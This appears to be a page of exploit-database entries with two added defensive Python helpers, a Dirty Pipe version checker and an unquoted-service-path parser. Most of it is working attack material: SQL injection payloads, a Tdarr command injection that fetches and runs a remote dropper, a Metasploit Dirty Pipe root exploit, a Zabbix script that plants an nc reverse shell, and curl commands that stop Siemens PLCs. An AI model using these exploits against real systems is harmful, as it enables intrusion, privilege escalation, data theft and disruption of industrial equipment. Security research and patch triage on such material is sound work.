<pre><code>## Title: Employee Performance Evaluation v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.11.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation<br /><br />## Description:<br />The `email` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the email parameter, and a database error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.<br />An attacker can take control of the administrator account and of every other account on this system, and can also download all information stored in it.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: email (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 6536<br />FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT<br />(ELT(6536=6536,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--<br />iQpA&password=hacked&login=0<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 2365 FROM<br />(SELECT(SLEEP(5)))lFkz)-- xqup&password=hacked&login=0<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/9q1tni)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Tdarr 2.00.15 - Command Injection<br /># Date: 10/03/2022<br /># Exploit Author: Sam Smith<br /># Vendor Homepage: https://tdarr.io<br /># Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip<br /># Version: 2.00.15 (likely also older versions)<br /># Tested on: 2.00.15<br /><br />Exploit:<br /><br />The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not filter their input, which allows the user to chain commands and spawn a reverse shell.<br /><br />e.g. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`.<br /><br />Tdarr is not protected by any authentication by default, so no credentials are required to trigger RCE.<br /><br /></code></pre>
<pre><code># Exploit Title: FLEX 1080/1085 Web - Information Disclosure<br /># Exploit Author: Mr Empy<br /># Vendor Homepage: https://www.tem.ind.br/<br /># Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94<br /># Version: 1.6.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />FLEX 1080/1085 Web - Information Disclosure<br /><br />Summary:<br />================<br />The FLEX 1080/1085 Web hardware allows the attacker to obtain sensitive<br />information such as username and password, WiFi SSID and WiFi password.<br /><br /><br />Severity Level:<br />================<br />9.1 (Critical)<br />CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N<br /><br /><br />Vulnerability Disclosure Schedule:<br />============================<br />* January 13, 2022: An email was sent to support.<br /><br />* February 13, 2022: I didn't get any response from support.<br /><br />* February 14, 2022: Vulnerability Disclosure<br /><br /><br />Affected Product:<br />================<br />FLEX 1080/1085 Web v1.6.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open a terminal and enter the following command:<br /><br />curl -X POST http://target.com/sistema/log.cgi -d 'force=1'<br /><br />After that you will be able to see the hardware logs without having any<br />authentication.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br />  Rank = ExcellentRanking<br /><br />  include Msf::Post::File<br />  include Msf::Post::Linux::Priv<br />  include Msf::Post::Linux::Kernel<br />  include Msf::Post::Linux::System<br />  include Msf::Post::Linux::Compile<br />  include Msf::Exploit::EXE<br />  include Msf::Exploit::FileDropper<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Dirty Pipe Local Privilege Escalation via CVE-2022-0847',<br />        'Description' => %q{<br />          This exploit targets a vulnerability in the Linux kernel since 5.8, that allows<br />          writing of read only or immutable memory.<br /><br />          The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.<br />          The module exploits this vulnerability by overwriting a suid binary with the<br />          payload, executing it, and then writing the original data back.<br /><br />          There are two major limitations of this exploit: the offset cannot be on a page<br />          boundary (it needs to write one byte before the offset to add a reference to<br />          this page to the pipe), and the write cannot cross a page boundary.<br />          This means the payload must be less than the page size (4096 bytes).<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'Max Kellermann', # Original vulnerability discovery<br />          'timwr', # Metasploit Module<br />        ],<br />        'DisclosureDate' => '2022-02-20',<br />        'SessionTypes' => ['shell', 'meterpreter'],<br />        'Platform' => [ 'linux' ],<br />        'Arch' => [<br />          ARCH_X64,<br />          ARCH_X86,<br />          ARCH_ARMLE,<br />          ARCH_AARCH64,<br />        ],<br />        'Targets' => [['Automatic', {}]],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'AppendExit' => true,<br />          'PrependSetresuid' => true,<br />          'PrependSetresgid' => true,<br />          'PrependSetreuid' => true,<br />          'PrependSetuid' => true,<br />          'PrependFork' => true,<br />          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br />        },<br />        'Privileged' => true,<br />        'References' => [<br />          [ 'CVE', '2022-0847' ],<br />          [ 'URL', 'https://dirtypipe.cm4all.com' ],<br />          [ 'URL', 'https://haxx.in/files/dirtypipez.c' ],<br />        ],<br />        'Notes' => {<br />          'AKA' => [ 'Dirty Pipe' ],<br />          'Reliability' => [ REPEATABLE_SESSION ],<br />          'Stability' => [ CRASH_SAFE ],<br />          'SideEffects' => [ ARTIFACTS_ON_DISK ]<br />        }<br />      )<br />    )<br />    register_options([<br />      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),<br />      OptString.new('SUID_BINARY_PATH', [ false, 'The path to a suid binary', '/bin/passwd' ])<br />    ])<br />  end<br /><br />  def check<br />    arch = kernel_arch<br />    unless live_compile? || arch.include?('x64') || arch.include?('aarch64') || arch.include?('x86') || arch.include?('armle')<br />      return CheckCode::Safe("System architecture #{arch} is not supported without live compilation")<br />    end<br /><br />    kernel_version = Rex::Version.new kernel_release.split('-').first<br />    if kernel_version < Rex::Version.new('5.8') ||<br />       kernel_version >= Rex::Version.new('5.16.11') ||<br />       (kernel_version >= Rex::Version.new('5.15.25') && kernel_version < Rex::Version.new('5.16')) ||<br />       (kernel_version >= Rex::Version.new('5.10.102') && kernel_version < Rex::Version.new('5.11'))<br />      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")<br />    end<br /><br />    CheckCode::Appears("Linux kernel version found: #{kernel_version}")<br />  end<br /><br />  def exp_dir<br />    datastore['WRITABLE_DIR']<br />  end<br /><br />  def exploit<br />    suid_binary_path = datastore['SUID_BINARY_PATH']<br />    fail_with(Failure::BadConfig, 'The suid binary was not found; try setting SUID_BINARY_PATH') if suid_binary_path.nil?<br />    fail_with(Failure::BadConfig, "The #{suid_binary_path} binary setuid bit is not set") unless setuid?(suid_binary_path)<br /><br />    arch = kernel_arch<br />    vprint_status("Detected architecture: #{arch}")<br />    vprint_status("Detected payload arch: #{payload.arch.first}")<br />    unless arch == payload.arch.first<br />      fail_with(Failure::BadConfig, 'Payload/Host architecture mismatch. Please select the proper target architecture')<br />    end<br /><br />    payload_data = generate_payload_exe[1..] # trim the first byte (0x74)<br />    if payload_data.length > 4095<br />      fail_with(Failure::BadConfig, "Payload size #{payload_data.length} is too large (> 4095)")<br />    end<br /><br />    fail_with(Failure::BadConfig, "#{exp_dir} is not writable") unless writable?(exp_dir)<br />    exploit_file = "#{exp_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"<br /><br />    if live_compile?<br />      vprint_status('Live compiling exploit on system...')<br />      exploit_c = exploit_data('CVE-2022-0847', 'CVE-2022-0847.c')<br />      exploit_c.sub!(/payload_bytes.*$/, "payload_bytes[#{payload_data.length}] = {#{Rex::Text.to_num(payload_data)}};")<br />      upload_and_compile(exploit_file, exploit_c)<br />    else<br />      vprint_status('Dropping pre-compiled exploit on system...')<br />      exploit_bin = exploit_data('CVE-2022-0847', "CVE-2022-0847-#{arch}")<br />      payload_placeholder_index = exploit_bin.index('PAYLOAD_PLACEHOLDER')<br />      exploit_bin[payload_placeholder_index, payload_data.length] = payload_data<br />      upload_and_chmodx(exploit_file, exploit_bin)<br />    end<br /><br />    register_file_for_cleanup(exploit_file)<br />    overwrite_file_path = datastore['SUID_BINARY_PATH']<br /><br />    cmd = "#{exploit_file} #{overwrite_file_path}"<br />    print_status("Executing exploit '#{cmd}'")<br />    result = cmd_exec(cmd)<br />    vprint_status("Exploit result:\n#{result}")<br />  end<br />end<br /></code></pre>
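The kernel-version gate in the module's `check` method, as a stand-alone Python checker for inventory or triage (an added example, not part of the Metasploit module): it encodes the three fixing releases from the module description as a per-branch table, which generalises the module's pairwise comparisons and makes the unfixed 5.9 and 5.11 to 5.14 branches explicit. The 5.17 mainline cut-off is an assumption taken from kernel release history, not from the page.

```python
import platform
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# First release carrying the CVE-2022-0847 fix on each stable branch that got one:
# the three releases named in the module description above.
FIRST_FIXED: Dict[Tuple[int, int], Version] = {
    (5, 10): (5, 10, 102),
    (5, 15): (5, 15, 25),
    (5, 16): (5, 16, 11),
}
FIRST_VULNERABLE: Version = (5, 8, 0)       # the bug was introduced in 5.8
FIRST_FIXED_MAINLINE: Version = (5, 17, 0)  # assumption: every mainline release from 5.17 is fixed


def parse_release(release: str) -> Optional[Version]:
    """Reduce a `uname -r` string such as '5.10.0-kali9-amd64' to (major, minor, patch),
    discarding the distribution suffix the way the module's split('-').first does."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def dirty_pipe_version_vulnerable(release: str) -> Optional[bool]:
    """True when the upstream version lies in a vulnerable range, False when it is
    older than 5.8 or at/after a fixing release, None when the string is unparseable.
    True means 'appears vulnerable' only: distribution kernels often backport the
    fix without changing the upstream version string, so confirm against the
    distribution's advisory or changelog before treating a host as exposed."""
    v = parse_release(release)
    if v is None:
        return None
    if v < FIRST_VULNERABLE or v >= FIRST_FIXED_MAINLINE:
        return False
    fixed = FIRST_FIXED.get(v[:2])
    if fixed is None:
        # 5.8, 5.9 and 5.11 to 5.14 were end-of-life when the fix shipped, so no
        # release on those branches contains it.
        return True
    return v < fixed


if __name__ == "__main__":
    import sys
    # With no argument, check the kernel this script is running on.
    release = sys.argv[1] if len(sys.argv) > 1 else platform.release()
    print(f"{release}: {dirty_pipe_version_vulnerable(release)}")
```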
<pre><code># Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 9/3/2022<br /># Exploit Author: Hussien Misbah<br /># Vendor Homepage: https://www.zabbix.com/<br /># Software Link: https://www.zabbix.com/rn/rn5.0.17<br /># Version: 5.0.17<br /># Tested on: Linux<br /># Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit<br /><br />#!/usr/bin/python3<br /># note : this is blind RCE so don't expect to see results on the site<br /># this exploit is tested against Zabbix 5.0.17 only<br /><br />import sys<br />import requests<br />import re<br />import random<br />import string<br />import colorama<br />from colorama import Fore<br /><br /><br />print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")<br />print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")<br /><br /><br />def item_name() :<br />    # random 20-letter item name so the created item can be found again<br />    letters = string.ascii_letters<br />    item = ''.join(random.choice(letters) for i in range(20))<br />    return item<br /><br />if len(sys.argv) != 6 :<br />    print(Fore.RED +"[!] usage : ./exploit.py <target url> <username> <password> <attacker ip> <attacker port>")<br />    sys.exit(-1)<br /><br />url = sys.argv[1]<br />username =sys.argv[2]<br />password = sys.argv[3]<br />host = sys.argv[4]<br />port = sys.argv[5]<br /><br /><br />s = requests.Session()<br /><br /><br />headers ={<br />    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",<br />}<br /><br />data = {<br />    "request":"hosts.php",<br />    "name" : username ,<br />    "password" : password ,<br />    "autologin" :"1" ,<br />    "enter":"Sign+in"<br />}<br /><br /><br />proxies = {<br />    'http': 'http://127.0.0.1:8080'<br />}<br /><br /><br />r = s.post(url+"/index.php",data=data) #proxies=proxies)<br /><br />if "Sign out" not in r.text :<br />    print(Fore.RED +"[!] Authentication failed")<br />    sys.exit(-1)<br />if "Zabbix 5.0.17" not in r.text :<br />    print(Fore.RED +"[!] This is not Zabbix 5.0.17")<br />    sys.exit(-1)<br /><br />if "filter_hostids%5B0%5D=" in r.text :<br />    try :<br />        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)<br />        hostId = x.group(1)<br />    except :<br />        print(Fore.RED +"[!] Exploit failed to resolve HostID")<br />        print(Fore.BLUE +"[?] you can find it under /items then add item")<br />        sys.exit(-1)<br />else :<br />    print(Fore.RED +"[!] Exploit failed to resolve HostID")<br />    print(Fore.BLUE +"[?] you can find HostID under /items then add item")<br />    sys.exit(-1)<br /><br /><br />sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token<br /><br /><br />command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"<br /><br />payload = f"system.run[{command},nowait]"<br />Random_name = item_name()<br />data2 ={<br />    "sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"<br />}<br /><br />r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )<br /><br /><br />no_pages= r2.text.count("?page=")<br /><br />#################################################[Searching in all pages for the uploaded item]#################################################<br />page = 1<br />flag=False<br />while page <= no_pages :<br />    r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )<br />    if Random_name in r_page.text :<br />        print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")<br />        x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)<br />        try :<br />            itemId=x2.group(1)<br />        except :<br />            pass<br /><br />        print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")<br />        flag=True<br />        break<br /><br />    else :<br />        page +=1<br /><br />if flag==False :<br />    print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")<br />    print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")<br />    print(Fore.BLUE +"[*] change the port and try again")<br />    sys.exit(-1)<br /><br />#################################################[Executing the item]#################################################<br /><br /><br />data2["form"] ="update"<br />data2["selectedInterfaceId"] = "1"<br />data2["check_now"]="Execute+now"<br />data2.pop("add",None)<br />data2["itemid"]=itemId<br /><br />print(Fore.GREEN+f"[+] set the listener at {port} please...")<br /><br />r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )<br /><br />print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")<br />answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")<br /><br />if "y" in answer.lower() :<br />    print(Fore.GREEN+"Nice !")<br />else :<br />    print(Fore.RED+"[!] if you find out why please contact me ")<br /><br />sys.exit(0)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command<br /># Date: 09/03/2022<br /># Exploit Author: RoseSecurity<br /># Vendor Homepage: https://www.siemens.com/global/en.html<br /># Version: V4.5 and below<br /># Tested on: Siemens S7-1200 (CPU: 1215C)<br /><br /># IP == PLC IP address<br /><br /># Start Command<br /><br />curl -i -s -k -X $'POST' \<br />    -H $'Host: <IP>' \<br />    -H $'Cache-Control: max-age=0' \<br />    -H $'Upgrade-Insecure-Requests: 1' \<br />    -H $'Origin: http://<IP>' \<br />    -H $'Content-Type: application/x-www-form-urlencoded' \<br />    -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' \<br />    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \<br />    -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' \<br />    -H $'Accept-Encoding: gzip, deflate' \<br />    -H $'Accept-Language: en-US,en;q=0.9' \<br />    -H $'Connection: close' \<br />    -b $'siemens_automation_no_intro=TRUE' \<br />    --data-binary $'Run=1&PriNav=Start' \<br />    'http://<IP>/CPUCommands'<br /><br /># Stop Command<br /><br />curl -i -s -k -X $'POST' \<br />    -H $'Host: <IP>' \<br />    -H $'Cache-Control: max-age=0' \<br />    -H $'Upgrade-Insecure-Requests: 1' \<br />    -H $'Origin: http://<IP>' \<br />    -H $'Content-Type: application/x-www-form-urlencoded' \<br />    -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' \<br />    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \<br />    -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' \<br />    -H $'Accept-Encoding: gzip, deflate' \<br />    -H $'Accept-Language: en-US,en;q=0.9' \<br />    -H $'Connection: close' \<br />    -b $'siemens_automation_no_intro=TRUE' \<br />    --data-binary $'Run=1&PriNav=Stop' \<br />    'http://<IP>/CPUCommands'<br /><br /></code></pre>
<pre><code># Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Exploit Date: 2022-03-09<br /># Vendor : ilwebmaster21<br /># Version : WOW21_Service 5.0.1.9<br /># Vendor Homepage : https://wow21.life/<br /># Tested on OS: Windows 10 Pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc WOW21_Service<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: WOW21_Service<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe<br /> GRUPPO_ORDINE_CARICAMENTO :<br /> TAG : 0<br /> NOME_VISUALIZZATO : WOW21_Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path<br /># Exploit Author: Antonio Cuomo (arkantolo)<br /># Exploit Date: 2022-03-09<br /># Vendor : David Xanatos<br /># Version : SbieSvc 5.50.2<br /># Vendor Homepage : https://sandboxie-plus.com/<br /># Tested on OS: Windows 10 Pro x64<br /><br />#PoC :<br />==============<br /><br />C:\>sc qc SbieSvc<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: SbieSvc<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe<br /> GRUPPO_ORDINE_CARICAMENTO : UIGroup<br /> TAG : 0<br /> NOME_VISUALIZZATO : Sandboxie Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege<br /># Date: 09/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.mcafee.com/<br /># Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html<br /># Version: 2.13<br /># Tested: Windows 10 x64<br /># Contact: https://twitter.com/dmaral3noz<br /><br />C:\Users\saudh>sc qc SafeConnectService<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SafeConnectService<br /><br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : McAfee Safe Connect Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path<br /># Date: 09/03/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.battleye.com/<br /># Software Link: https://www.battleye.com/downloads/<br /># Version: 0.94<br /># Tested: Windows 10 Pro <br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br />C:\Users\saudh>sc qc BEService<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: BEService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 3 DEMAND_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : BattlEye Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
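The four unquoted-service-path advisories above (WOW21, Sandboxie-Plus, McAfee Safe Connect, BattlEye) all rest on the same `sc qc` observation. As an added example that is not from any of those advisories, this Python parser classifies an `sc qc` listing in either the English or the Italian locale shown on this page and produces the `sc config` command that quotes the path; the sample listing is constructed from the McAfee entry, and the function and label names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Optional, Sequence, Tuple

# Labels `sc qc` prints for the service name and the binary path in the
# English and the Italian locale (both locales appear in the advisories above).
NAME_LABELS = ("SERVICE_NAME", "NOME_SERVIZIO")
PATH_LABELS = ("BINARY_PATH_NAME", "NOME_PERCORSO_BINARIO")


@dataclass
class Finding:
    service: str
    bin_path: str
    unquoted: bool   # True: unquoted path with a space in the executable part


def _field(text: str, labels: Sequence[str]) -> Optional[str]:
    # First label that matches at the start of a line wins, value after the colon.
    for label in labels:
        m = re.search(rf"^\s*{label}\s*:\s*(.*)$", text, re.MULTILINE)
        if m:
            return m.group(1).strip()
    return None


def _split_exe(bin_path: str) -> Tuple[str, str]:
    """Split 'C:\\dir with space\\svc.exe -k args' into the executable and its
    arguments; only the executable part is ambiguous to the service control manager."""
    m = re.match(r"^(.*?\.exe)(.*)$", bin_path, re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else (bin_path, "")


def has_unquoted_space(bin_path: str) -> bool:
    """The condition the advisories report: path not wrapped in quotes and a space
    somewhere in the executable path itself (spaces in arguments are harmless)."""
    if bin_path.startswith('"'):
        return False
    exe, _ = _split_exe(bin_path)
    return " " in exe


def check_sc_qc(output: str) -> Optional[Finding]:
    """Parse one `sc qc <service>` listing; None when the fields are missing."""
    name = _field(output, NAME_LABELS)
    path = _field(output, PATH_LABELS)
    if name is None or path is None:
        return None
    return Finding(name, path, has_unquoted_space(path))


def remediation_command(finding: Finding) -> str:
    """The `sc config` line that quotes the path in place: sc.exe requires the
    space after 'binPath=', and the inner quotes are escaped for cmd.exe."""
    exe, args = _split_exe(finding.bin_path)
    return f'sc config {finding.service} binPath= "\\"{exe}\\"{args}"'


# Constructed sample: the McAfee Safe Connect listing from the advisory above.
SAMPLE_EN = """\
SERVICE_NAME: SafeConnectService
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\McAfee\\McAfee Safe Connect\\SafeConnect.ServiceHost.exe
        SERVICE_START_NAME : LocalSystem
"""
```

Feed it the output of `sc qc <service>` for every service from `sc query` to get the same finding the advisories report, plus the quoting command that removes it.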